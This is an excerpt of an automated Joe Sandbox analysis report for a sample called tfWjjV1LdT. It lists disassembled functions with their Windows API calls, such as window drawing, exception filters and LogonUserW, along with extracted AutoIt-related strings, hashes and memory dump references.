API String ID: 81990902-0
Opcode ID: 73170eb09ec0293c0bdc8c0622d84a322f7e26f9f7cdff7ce92c493933496545
Instruction ID: fde72bb9f84ca11ba7a88f65ed8a0e7fa227fffeac4853f7628b03362f758015
Opcode Fuzzy Hash: 73170eb09ec0293c0bdc8c0622d84a322f7e26f9f7cdff7ce92c493933496545
Instruction Fuzzy Hash: 88E0EC72011611AFF7652B65EC09DF77BEAEF04350714C92DF8AA84470DB62AC91DB14

Function 006BA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,006B8D57,?,?,?,00000001), ref: 006BA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006BA163

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
Instruction ID: 4c89e8386ef48c08879af788833d57eb997205edbe68495228d50cdb18ea6403
Opcode Fuzzy Hash: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
Instruction Fuzzy Hash: 1BB09231054208EBCA002B99EC09BC83F68FB44BA2F40C020F61D840A0CB6654508A99

Function 006BF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
Instruction ID: 61be45b606631951f55aef7cdd1e535d1c9bdc9f4bf4b4ebba3f60500aecdf39
Opcode Fuzzy Hash: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
Instruction Fuzzy Hash: 9F3202A1D29F414DD7279638CD32376A249AFB73C4F15D737E819B5AA6EB28C4C34204

Function 006C242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
Instruction ID: 012579cd408e4de3d872a64061aff51a872afb6b8299f24bcfacfb64dd9ff406
Opcode Fuzzy Hash: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
Instruction Fuzzy Hash: F0B10020E2AF414ED723A6398831336BB5CAFBB2D5F52D71BFC2674D22EB2585834145

Function 006E87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006E8389), ref: 006E87D1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
Instruction ID: cc71d78a571d8e6110c9bf680d00c43c933df90cb4d464d4768eb32df7ad6651
Opcode Fuzzy Hash: 9059458491c237d9ca12df0cc668a381c984fd4fcf4dfafa6eb6412243109fcc
Instruction Fuzzy Hash: 68D09E3226450EABEF019EA8DD05EEE3B69EB04B01F40C511FE15D51A1C775D935AB60

Function 006BA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 006BA12A

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
Instruction ID: 63a041da0162bfc313d8ef5c2c202dfcb5437c006ab3692812d989ebbc0eec62
Opcode Fuzzy Hash: 6830744d266f9515a043f14290ff4e7ee6e576fe1e4ca19b1ed2e5249884f2e3
Instruction Fuzzy Hash: 31A0113000020CAB8A002B8AEC08888BFACEA002A0B00C020F80C80022CB32A8208A88

Function 006A8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2c77fdc7862b34c7ab930cbba3ddb586d87d8be2d294d125e26b315006cfd9
Instruction ID: cb495f13a4a16f543abdf2211f49e037976817ab63bd776374a9431f9b92b241
Opcode Fuzzy Hash: 9f2c77fdc7862b34c7ab930cbba3ddb586d87d8be2d294d125e26b315006cfd9
Instruction Fuzzy Hash: 3B222930904686CFDF38AA29C4947FD77A3FF42348F24806BD6568B692DB749D92CE41

Function 006B21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: db3a295521c6ec304242cd6a2d5c97b6c8e62f97230b6d1f129f37d7d704e23b
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: F6C173B22151930ADB2D4639C4740FEBBE25EA37B135A176DD4B2CF2D4EE20C9A5D720

Function 006B25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 05a1af58587e65e37fb7db8cf6453a1e82891a3cb9b0b40c19bbc3784599c448
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 72C184B22151930ADF2D463A84340FEBBE25EA37B135A176DD4B2DF2D4EE10C9A5D720

Function 006B1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: f1d67cb040e52d1fc8129b0ef477110241ef1915096beec576f861a468a0a7b2
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 5DC194B22151931ADF2D4639C4340FEBBA25EA37B135A176DD4B2CF2C4EE20D9A5D710

Function 00D54230 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 1a1bc5d7cd19ba1f0804e21d50c9b9ac4cfe51760da4fbeb3cb72b166de85b1b
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: D541E371D1051CEBDF48CFADC890AEEBBF2AF88201F548299D516AB345C730AB41DB50

Function 00D540C0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: dc2e151f3550f8aee3b36a0e6956b96960107102652cc8f1bcdfe9b0576b1014
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 9D019D78A00209EFCB48DF98C5909AEF7B5FF58310F208599ED09A7341E730AE91DB90

Function 00D54120 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: c6207b8f9edaf6aab92c097f901ec22e0c5af85cbd72c031d3642c1de91272a6
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: E0019278A00609EFCB44DF98C5909AEF7B5FF58310F208599ED19A7705D730AE81DB90

Function 00D52A90 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00707806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0070785B
DeleteObject.GDI32(00000000), ref: 0070786D
DestroyWindow.USER32 ref: 0070787B
GetDesktopWindow.USER32 ref: 00707895
GetWindowRect.USER32(00000000), ref: 0070789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007079DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007079ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707A35
GetClientRect.USER32(00000000,?), ref: 00707A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00707A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707ABB
GlobalLock.KERNEL32(00000000), ref: 00707AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707AD3
GlobalUnlock.KERNEL32(00000000), ref: 00707ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707AE3
GlobalFree.KERNEL32(00000000), ref: 00707AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00722CAC,00000000), ref: 00707B16
GlobalFree.KERNEL32(00000000), ref: 00707B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00707B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00707B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00707D7A

Strings

DISPLAY, xrefs: 00707BDD
, xrefs: 00707D00
static, xrefs: 00707A75, 00707BCC
AutoIt v3, xrefs: 00707A2D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 1076611c56ad524fc611efdc4c54287bf177679a8fa5e2265c78f23400296ef2
Instruction ID: d7cf44fa67297d87183ef710a510ce5de7e561d8aae46429b8965128ca54dc16
Opcode Fuzzy Hash: 1076611c56ad524fc611efdc4c54287bf177679a8fa5e2265c78f23400296ef2
Instruction Fuzzy Hash: AF024E71900215EFDB14DFA8DC89EAE7BB9FB48310F148258F915AB2E1D778AD01CB64

Function 0071356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0071F910), ref: 00713627
IsWindowVisible.USER32(?), ref: 0071364B

Strings

ISCHECKED, xrefs: 00713839
GETLINE, xrefs: 0071399B
SELECTSTRING, xrefs: 00713806
TABLEFT, xrefs: 00713687
SENDCOMMANDID, xrefs: 007139DA
ISVISIBLE, xrefs: 00713637
GETSELECTED, xrefs: 007138A3
DELSTRING, xrefs: 00713749
TABRIGHT, xrefs: 0071369D
GETCURRENTCOL, xrefs: 00713928
GETCURRENTLINE, xrefs: 007138ED
GETLINECOUNT, xrefs: 007138C6
GETCURRENTSELECTION, xrefs: 007137E3
UNCHECK, xrefs: 00713883
CHECK, xrefs: 0071386D
HIDEDROPDOWN, xrefs: 00713700
EDITPASTE, xrefs: 0071395F
ISENABLED, xrefs: 0071366B
ADDSTRING, xrefs: 00713716
CURRENTTAB, xrefs: 007136BD
SHOWDROPDOWN, xrefs: 007136E0
FINDSTRING, xrefs: 00713776
SETCURRENTSELECTION, xrefs: 007137B6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 6f8996f6a10b23a146b7a2995820051c5bfa0ceace99ed5c4052b5303e884de7
Instruction ID: dd0192255e4dce84e145629d8d4dda1005a462a12ebec36bc61b15d31f22264d
Opcode Fuzzy Hash: 6f8996f6a10b23a146b7a2995820051c5bfa0ceace99ed5c4052b5303e884de7
Instruction Fuzzy Hash: F9D182702143019BCB44EF18C452AAF7BA6AF54354F14486CF8855B2E3DB39EE8ACB55

Function 0071A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0071A630
GetSysColorBrush.USER32(0000000F), ref: 0071A661
GetSysColor.USER32(0000000F), ref: 0071A66D
SetBkColor.GDI32(?,000000FF), ref: 0071A687
SelectObject.GDI32(?,00000000), ref: 0071A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0071A6C1
GetSysColor.USER32(00000010), ref: 0071A6C9
CreateSolidBrush.GDI32(00000000), ref: 0071A6D0
FrameRect.USER32(?,?,00000000), ref: 0071A6DF
DeleteObject.GDI32(00000000), ref: 0071A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0071A731
FillRect.USER32(?,?,00000000), ref: 0071A763
GetWindowLongW.USER32(?,000000F0), ref: 0071A78E

Part of subcall function 0071A8CA: GetSysColor.USER32(00000012), ref: 0071A903
Part of subcall function 0071A8CA: SetTextColor.GDI32(?,?), ref: 0071A907
Part of subcall function 0071A8CA: GetSysColorBrush.USER32(0000000F), ref: 0071A91D
Part of subcall function 0071A8CA: GetSysColor.USER32(0000000F), ref: 0071A928
Part of subcall function 0071A8CA: GetSysColor.USER32(00000011), ref: 0071A945
Part of subcall function 0071A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0071A953
Part of subcall function 0071A8CA: SelectObject.GDI32(?,00000000), ref: 0071A964
Part of subcall function 0071A8CA: SetBkColor.GDI32(?,00000000), ref: 0071A96D
Part of subcall function 0071A8CA: SelectObject.GDI32(?,?), ref: 0071A97A
Part of subcall function 0071A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0071A999
Part of subcall function 0071A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071A9B0
Part of subcall function 0071A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0071A9C5
Part of subcall function 0071A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0071A9ED

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: a3eb296cd5e9263b44cb4229698199dbd16c3ebf3e7d10c84ff66082249dfb20
Instruction ID: 9dab24bd0836e98f2d5fecde9d5120685fcdf05419670bee28ecb348bbcf271d
Opcode Fuzzy Hash: a3eb296cd5e9263b44cb4229698199dbd16c3ebf3e7d10c84ff66082249dfb20
Instruction Fuzzy Hash: 56918D72409305FFC7119F68DC08A9B7BAAFF88321F108B29F966961E1D738D944CB56

Function 00692C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00692CA2
DeleteObject.GDI32(00000000), ref: 00692CE8
DeleteObject.GDI32(00000000), ref: 00692CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00692CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00692D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 006CC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006CC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006CC89D

Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A

SendMessageW.USER32(?,00001053), ref: 006CC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006CC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006CC912

Strings

0, xrefs: 006CC731

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 252447cc8004588960b8fb1c0a1ea85ddecf531680a9371849cb599709a0c529
Instruction ID: fde2eb3ae0e3d89368874269461a24aaec15d9211b6baa04a7e126fa1e1d2732
Opcode Fuzzy Hash: 252447cc8004588960b8fb1c0a1ea85ddecf531680a9371849cb599709a0c529
Instruction Fuzzy Hash: 9A126A30600202EFDB55CF28C894BB9BBE6FF45320F54856DE499DB662C731E852DB91

Function 007074AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007074DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0070759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007075DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007075ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00707633
GetClientRect.USER32(00000000,?), ref: 0070763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00707683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00707692
GetStockObject.GDI32(00000011), ref: 007076A2
SelectObject.GDI32(00000000,00000000), ref: 007076A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007076B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007076BF
DeleteDC.GDI32(00000000), ref: 007076C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007076F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0070770B
